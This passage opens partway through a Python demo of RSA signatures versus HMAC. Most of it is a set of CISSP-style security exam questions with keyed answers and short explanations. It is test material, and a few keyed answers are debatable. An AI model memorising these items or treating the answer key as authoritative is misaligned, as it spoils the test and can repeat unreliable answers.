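    """Sender only: apply the private key to the digest."""
    return pow(_digest_int(msg), private_exponent, N)


def verify(msg: bytes, signature: int, public_exponent: int = E, modulus: int = N) -> bool:
    """Anyone with the public key can check. Only the private key could
    have produced a value that verifies, and a CA-issued certificate binds
    that public key to the signer, which is what gives non-repudiation."""
    return pow(signature, public_exponent, modulus) == _digest_int(msg)


if __name__ == "__main__":
    doc = b"Pay 100 to Bob"
    sig = sign(doc)
    print("receiver can reproduce the HMAC:", receiver_can_forge(doc))
    print("signature verifies:", verify(doc, sig))
    print("altered document verifies:", verify(b"Pay 1000 to Bob", sig))
```

The verify() call would also reject a document the recipient re-signed with their own key pair, because the check is performed against the sender's public key; that asymmetry, not the hash, is what the question is testing.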

In Federated Identity Management (FIM), which of the following represents the concept of federation? A. Collection, maintenance, and deactivation of user objects and attributes in one or more systems, directories or applications B. Collection of information logically grouped into a single entity C. Collection of information for common identities in a system D. Collection of domains that have established trust among themselves

D. Collection of domains that have established trust among themselves

What is the MOST common security risk of a mobile device? A. Data spoofing B. Malware infection C. Insecure communications link D. Data leakage

D. Data leakage

Dumpster diving is a technique used in which stage of penetration testing methodology? A. Attack B. Reporting C. Planning D. Discovery

D. Discovery The discovery stage is focused on gathering information about the target organization, its systems, and its infrastructure. This information can include both technical and non-technical data. Dumpster diving specifically involves searching through physical trash or waste disposal areas of the target organization to gather potentially sensitive or valuable information. By examining discarded documents, invoices, printouts, or other materials, an attacker can uncover valuable information such as system configurations, network diagrams, passwords, or even confidential documents. This information can then be used in subsequent stages of the penetration test to exploit vulnerabilities and gain unauthorized access to the target organization's systems.

A security professional can BEST mitigate the risk of using a Commercial Off-The-Shelf (COTS) solution by deploying the application with which of the following controls in place? A. Network segmentation B. Blacklisting application C. Whitelisting application D. Hardened configuration

D. Hardened configuration. Hardening a COTS application means removing or changing the settings you do not need or want: disabling unused services and features, changing default usernames, passwords and ports, tightening file permissions, and applying the vendor's security baseline and patches before exposure. Network segmentation limits how far an attacker can move after compromising the application, but it still leaves the COTS product itself exposed with its defaults readily available to be exploited, so it complements hardening rather than replacing it.

The security team is notified that a device on the network is infected with malware. Which of the following is MOST effective in enabling the device to be quickly located and remediated? A. Data loss protection (DLP) B. Intrusion detection C. Vulnerability scanner D. Information Technology Asset Management (ITAM)

D. Information Technology Asset Management (ITAM) ITAM involves tracking and managing the inventory of IT assets within an organization, including devices such as computers, servers, and network devices. By maintaining an up-to-date record of all devices, their locations, and configurations, ITAM can help identify the specific device that is infected with malware. Once the infected device is identified through ITAM, appropriate remediation actions can be taken, such as isolating the device, conducting a thorough scan for malware, applying patches or updates, or even physically removing and replacing the device if necessary.

Which service management process BEST helps information technology (IT) organizations with reducing cost, mitigating risk, and improving customer service? A. Kanban B. Lean Six Sigma C. Information Technology Service Management (ITSM) D. Information Technology Infrastructure Library (ITIL)

D. Information Technology Infrastructure Library (ITIL) The service management process that best helps IT organizations with reducing cost, mitigating risk, and improving customer service is ITIL (Information Technology Infrastructure Library). ITIL is a widely adopted framework for IT service management that provides best practices and guidelines to align IT services with the needs of the business. Within ITIL, several processes contribute to these objectives, but one of the most crucial ones is Service Level Management (SLM). SLM is responsible for defining, negotiating, documenting, monitoring, measuring, reporting, and reviewing the level of IT services provided to customers. By effectively managing service levels, IT organizations can ensure that they meet customer expectations, reduce costs by optimizing service delivery, and mitigate risks by proactively addressing issues and vulnerabilities

A colleague who recently left the organization asked a security professional for a copy of the organization's confidential incident management policy. Which of the following is the BEST response to this request? A. Access the policy on a company-issued device and let the former colleague view the screen. B. E-mail the policy to the colleague as they were already part of the organization and familiar with it. C. Do not acknowledge receiving the request from the former colleague and ignore them. D. Submit the request using company official channels to ensure the policy is okay to distribute.

D. Submit the request using company official channels to ensure the policy is okay to distribute. Option D is the most appropriate response because it ensures that proper procedures are followed for distributing sensitive organizational policies, especially after the colleague has left the organization. By submitting the request through official channels, such as contacting the appropriate personnel in the organization's administration or legal department, it allows for proper review and authorization before sharing the policy.

Physical assets defined in an organization's business impact analysis (BIA) could include which of the following? A. Personal belongings of organizational staff members B. Disaster recovery (DR) line-item revenues C. Cloud-based applications D. Supplies kept off-site at a remote facility

D. Supplies kept off-site at a remote facility

An international trading organization that holds an International Organization for Standardization (ISO) 27001 certification is seeking to outsource their security monitoring to a managed security service provider (MSSP). The trading organization's security officer is tasked with drafting the requirements that need to be included in the outsourcing contract. Which of the following MUST be included in the contract? A. A detailed overview of all equipment involved in the outsourcing contract B. The right to perform security compliance tests on the MSSP's equipment C. The MSSP having an executive manager responsible for information security D. The right to audit the MSSP's security process

D. The right to audit the MSSP's security process https://resources.sei.cmu.edu/asset_files/securityimprovementmodule/2003_006_001_14105.pdf

A financial organization that works according to agile principles has developed a new application for their external customer base to request a line of credit. A security analyst has been asked to assess the security risk of the minimum viable product (MVP). Which is the MOST important activity the analyst should assess? A. The software has been signed off for release by the product owner. B. The software had been branded according to corporate standards. C. The software has the correct functionality. D. The software has been code reviewed.

D. The software has been code reviewed Code review is a process of inspecting code to identify potential security vulnerabilities. It is an important part of the software development lifecycle, and it can help to prevent security breaches. The other options are not as important as code review. The software has been signed off for release by the product owner: This is important, but it does not guarantee that the software is secure. The software has been branded according to corporate standards: This is also important, but it is not as important as security. The software has the correct functionality: This is important, but it is not as important as security.

The Industrial Control System (ICS) Computer Emergency Response Team (CERT) has released an alert regarding ICS-focused malware specifically propagating through Windows-based business networks. Technicians at a local water utility note that their dams, canals, and locks controlled by an internal Supervisory Control and Data Acquisition (SCADA) system have been malfunctioning. A digital forensics professional is consulted in the Incident Response (IR) and recovery. Which of the following is the MOST challenging aspect of this investigation? A. Group policy implementation B. SCADA network latency C. Physical access to the system D. Volatility of data

D. Volatility of data

When auditing the Software Development Life Cycle (SDLC) which of the following is one of the high-level audit phases? A. Planning B. Risk assessment C. Due diligence D. Requirements

D. The Official CISSP CBK (6th edition) lists the software development auditing phases as: Requirements phase; Implementation phase; Verification phase; Operation and maintenance phase.

A hospital enforces the Code of Fair Information Practices. What practice applies to a patient requesting their medical records from a web portal? A. Purpose specification B. Collection limitation C. Use limitation D. Individual participation

D. Individual participation. Individual participation refers to the right of individuals to access and participate in the management of their personal information. It empowers individuals to have control over their data and allows them to exercise their rights, such as requesting access to their personal information or requesting corrections or updates to their records. In the given scenario, when a patient requests their medical records from a web portal, they are exercising their right to access their personal information. The hospital, by providing a web portal for such requests, enables individual participation and facilitates the patient's access to their medical records.

In a disaster recovery (DR) test, which of the following would be a trait of crisis management? A. Process B. Anticipate C. Strategic D. Wide focus

The answer is B. Anticipate. Crisis management is the process of planning and responding to unexpected events that can have a negative impact on an organization. One of the key traits of crisis management is the ability to anticipate potential problems and develop plans to mitigate their impact. This means being able to think ahead and identify potential risks, as well as having a plan in place to deal with them if they do occur.
